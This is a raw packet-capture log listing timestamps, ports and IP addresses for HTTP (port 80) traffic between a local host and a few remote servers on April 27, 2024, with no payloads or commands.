                                                                                                                                                      Apr 27, 2024 02:19:16.251498938 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.251533031 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.251583099 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.260771036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.260833979 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.262751102 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.313529968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.313657045 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.313709021 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.314873934 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.315066099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.315114021 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.375740051 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.375799894 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.375808954 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.375854969 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.409300089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.409449100 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.409468889 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.409506083 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.409519911 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.409609079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.409611940 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.409672022 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.409729004 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.413110971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.413191080 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.413244009 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.413286924 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.413355112 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.413399935 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.420722008 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.420768976 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.420783043 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.420821905 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.420902014 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.420949936 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.420973063 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421034098 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.421261072 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421318054 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.421365976 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421442032 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.421475887 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421518087 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421576023 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.421593904 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421643972 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.421735048 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.421804905 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.457092047 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.457173109 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.457281113 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.457340956 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.509589911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.509933949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.509988070 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.510761023 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.546071053 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.546138048 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.546221018 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.546622038 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.558938026 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.592266083 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.592370987 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.592391014 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.592444897 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.592483997 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.592525959 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.592581987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.592601061 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.592652082 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.592699051 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.592756033 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.593066931 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.593127012 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.593159914 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.593235016 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.593419075 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.593487978 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.593538046 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.593612909 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.604877949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.604963064 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.604981899 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.604996920 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.605007887 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.605057955 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.605081081 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.605129004 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.605145931 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.605211020 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.605252981 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.605293036 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.608412027 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.608458042 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.608495951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.608514071 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.608541965 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.608571053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.608594894 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.608620882 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.652777910 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.652861118 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.652877092 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.652913094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.652951002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.653048038 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.705739021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.705852985 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.705873966 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.705899954 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.717850924 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.717915058 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.753457069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.753546000 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.764445066 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764508009 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.764513969 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764569998 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764570951 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.764621973 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.764624119 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764678955 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764678955 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.764731884 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764735937 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.764785051 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.764883041 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.764970064 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.765094042 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.765280962 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.765337944 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.765398026 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.765469074 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.801244020 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.801315069 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.801357985 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.801414013 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.801434994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.801486969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.801536083 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.801587105 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.801614046 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.804610968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.804843903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.804925919 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.804965019 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.817269087 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.817392111 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.848570108 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.848629951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.848717928 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.889681101 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.893506050 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.936094046 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.936223030 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.936249018 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.936300039 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.936341047 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.936410904 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.936444998 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.936497927 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.936497927 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.936553001 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.937092066 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.937146902 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.937392950 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.940331936 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.949455976 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.989320993 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.989582062 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:16.996489048 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.996604919 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.996721983 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.996809006 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.996849060 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.996901989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.996965885 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:16.996984959 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.997071028 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:16.997230053 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.000266075 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.000335932 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.000387907 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.045430899 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.045587063 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.045646906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.045660973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.066154957 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.066359997 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.090351105 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.107929945 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.107985020 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.108036995 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.108092070 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.108155966 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.108177900 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.108251095 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.108350039 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.108781099 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.108844995 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.108881950 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.108941078 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.112190008 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.112243891 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.112265110 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.112320900 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.160125971 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.160238981 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.191956997 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192051888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192157030 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.192203045 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192317009 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192397118 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.192439079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192503929 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192562103 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.192625999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192677021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.192724943 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.195657969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.195712090 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.195766926 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.195976973 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.242209911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.242269993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.242357016 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.279381990 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.279443979 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.279546022 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.279598951 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.279658079 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.279663086 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.279795885 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.279949903 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.280004978 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.280013084 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.280060053 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.283637047 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.283693075 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.283771038 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.286562920 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.290323973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.332115889 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.332186937 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.332254887 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.332312107 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.387366056 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.387419939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.387474060 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.387491941 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.387798071 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.387851000 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.387892008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.387934923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.387984037 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.388005972 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.388056993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.390299082 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.391921997 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.392066002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.392126083 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.423813105 CEST4972380192.168.2.4199.232.210.172
                                                                                                                                                      Apr 27, 2024 02:19:17.440512896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.440567970 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.440618038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.440638065 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.454879999 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.454977036 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.454982996 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.455032110 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.455132008 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.455197096 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.461292028 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.461360931 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.489777088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.489865065 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.489919901 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.503956079 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.504024029 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.504025936 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.504081964 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:17.512094021 CEST8049723199.232.210.172192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.512155056 CEST8049723199.232.210.172192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.512254000 CEST4972380192.168.2.4199.232.210.172
                                                                                                                                                      Apr 27, 2024 02:19:17.543311119 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.583678961 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.583858967 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.584451914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.584502935 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:17.584575891 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:17.584625959 CEST4973480192.168.2.4176.97.76.106
